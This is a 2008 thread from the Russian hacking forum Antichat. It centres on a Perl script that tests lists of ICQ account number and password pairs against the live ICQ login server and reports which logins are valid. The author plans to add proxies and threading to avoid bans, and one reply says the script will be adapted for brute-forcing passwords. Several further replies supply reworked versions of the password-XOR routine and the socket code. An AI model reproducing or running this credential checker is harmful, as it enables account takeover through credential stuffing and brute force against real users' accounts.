Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Маленький Icq чекер (https://forum.antichat.xyz/showthread.php?t=61618)

biophreak 12.02.2008 15:54

Маленький Icq чекер
 
Для собственных нужд накалякал маленький чекер асек по листу (uin;pass)
В планах добавить соксы и треды, пока с задержкой 5 секунд чекаю, ибо надо было для небольших листов...в общем может кому пригодится:
PHP код:

#!perl
# Simple icq list checker by biophreak ( s-teals.org )
# Usage: perl ./icq-check.pl <uins.list>
use warnings;
use 
strict;
use 
Socket;
use 
IO::Handle;
my $DEBUG 0# just for fun
my $uinlist shift || die '[ERROR] Specify uinlist!';
my $timeout 3### Wait some time before next check
####################################################
my($uin$pass);
(
open U$uinlist and my @uins = <U> and close U) or die "Cannot open file $uinlist: $!\n"

for (
my $i=0$i scalar @uins$i++)
{
    (
$uin,$pass) = split /;/,$uins[$i];
    
chomp $pass;
    
icq_check($uin$pass) if defined $uin and defined $pass;
    
sleep $timeout;
}

sub icq_check
{
  
my ($uin$password) = @_;
  
my ($server,$port) = ("login.icq.com"5190);
  
my ($socket,$i,$answer_data,$auth_request,$flap,$data);
  
my $seq_num rand(0xFFFF);
  
$data"\x00\x00\x00\x01\x00\x01".pack('n',length $uin).$uin."\x00\x02".pack('n',length $password).substr($password^"\xF3\x26\x81\xC4\x39\x86\xDB\x92\x71\xA3\xB9\xE6\x53\x7A\x95\x7C",0,length $password);
  
$flap "\x2a\x01".pack('n',$seq_num++).pack('n',length $data);
  
$auth_request =$flap.$data;
  
socket(SOCKAF_INETSOCK_STREAMgetprotobyname('tcp')) or die "Cannot open socket: $!\n"
  
connect(SOCKsockaddr_in($portinet_aton($server))) or die "Cannot connect: $!\n";
  
SOCK->autoflush(1);
  
sysread(SOCK,$answer_data,16) or die "Cannot read from socket: $!\n";
  print 
SOCK $auth_request;
  
sysread(SOCK,$answer_data,96) or die "Cannot read from socket: $!\n";;
  if (
$answer_data =~ /mismatch_passwd.html/io) {
      print 
"[DEBUG] $answer_data\n" if $DEBUG == 1;
        print 
"[BAD] : [ $uin;$pass ]\n";
    
    } 
elsif($answer_data =~/(\d*\.\d*\.\d*\.\d*)\:(\d*)/o) {
        print 
"[DEBUG] $answer_data\n" if $DEBUG == 1;
        print 
"[GOOD] : [ $uin;$pass ]\n";
    } else {
        print 
"[DEBUG] $answer_data\n" if $DEBUG == 1;
        print 
"[ERROR] [ $uin;$pass ] - Too many tries(or too fast).Try later\n";
    }
  
close SOCK;


ЗЫЖ Делая смотрел в сорцы BuH@LicH, выкинул лишние заголовки пакета логина (такие как версии клиента, его идентификатор, язык), ну и другое, не нужное для логина...

Isis 12.02.2008 16:21

оО маладетс...
А я для брута возьму ;-)

biophreak 12.02.2008 16:28

Аськовцы могут забанить...надеюсь, в ближайшее будущее прикручу соксы :)

Isis 12.02.2008 17:26

Не могут они забанить..
Я делать буду под брут, а там 1 к 100 тясячам что пасс подойдет..

biophreak 12.02.2008 17:55

да я про то, что они при множестве частых попыток банят :) правда на 1 уин...на разные по-идее должно без проблем отработать...

Tapaceuka 12.02.2008 20:01

куль, токо осталось откапать бесплатный хостинг где с этими сокетами попёр бы скрипт

demonoid 12.02.2008 20:24

Код:

for (my $i=0; $i < scalar @uins; $i++)
имхо так интересней
Код:

for ( my $i=0; $i < $#uins+1; $i++ )
Код:

sub xor_password
{
    my $password = shift;
    my @xor=("\xF3", "\x26", "\x81", "\xC4", "\x39", "\x86","\xDB", "\x92", "\x71", "\xA3", "\xB9", "\xE6", "\x53", "\x7A", "\x95","\x7C");
    my $xored_password;
    my $i = 0;
    foreach my $pchar(split //,$password) {
        $xored_password.=$pchar ^ $xor[$i++];
        $i=0 if $i eq @xor; #глупо  максимальная длина пароля 8 символов
    }
    return $xored_password;
}

Кривовато написано , мой вариант :
Код:

sub xor_password
{
    my ( $pwd,$xor_pwd ) =( shift,undef );
 
    my @xor=( "\xF3", "\x26", "\x81", "\xC4",
              "\x39", "\x86", "\xDB", "\x92",
              "\x71", "\xA3", "\xB9", "\xE6",
              "\x53", "\x7A", "\x95", "\x7C" );

    for( my $i=0;$i<length($pwd);$i++ )
    {
        $xor_pwd.= substr($pwd,$i,1)^$xor[$i];
    }
    return $xor_pwd;
}

а вообще молодец++ ! :)

Digimortal 12.02.2008 21:06

>> имхо так интересней

неа.. )

>> Кривовато написано , мой вариант

ну тогда вот и мой: +)
Код:

sub xor_password {

        my $pwd = shift;

        my $xor = "\xF3\x26\x81\xC4\x39\x86\xDB\x92"
                . "\x71\xA3\xB9\xE6\x53\x7A\x95\x7C";

        return substr($pwd^$xor, 0, length($pwd));
}


biophreak 13.02.2008 12:26

Немного почистил код, решил пообще не юзать ф-ию xor_password...подглядел в подсказку Digimortal =)
Обновил первый пост...

ЗЫЖ Посмотрел в шапку скрипта, понял что что-то не то, потом понял что именно:
use Socket;
use IO::Handle;
поправил на
use IO::Socket; =)

FooBar 14.02.2008 14:04

если ты создаешь сокет как в С, то тогда там use Socket нужно использовать, а если уж ты используешь IO::Socket::INET, то можно сделать в одну строку $socket = new IO::Socket::INET('login.icq.com:5190');


Время: 14:48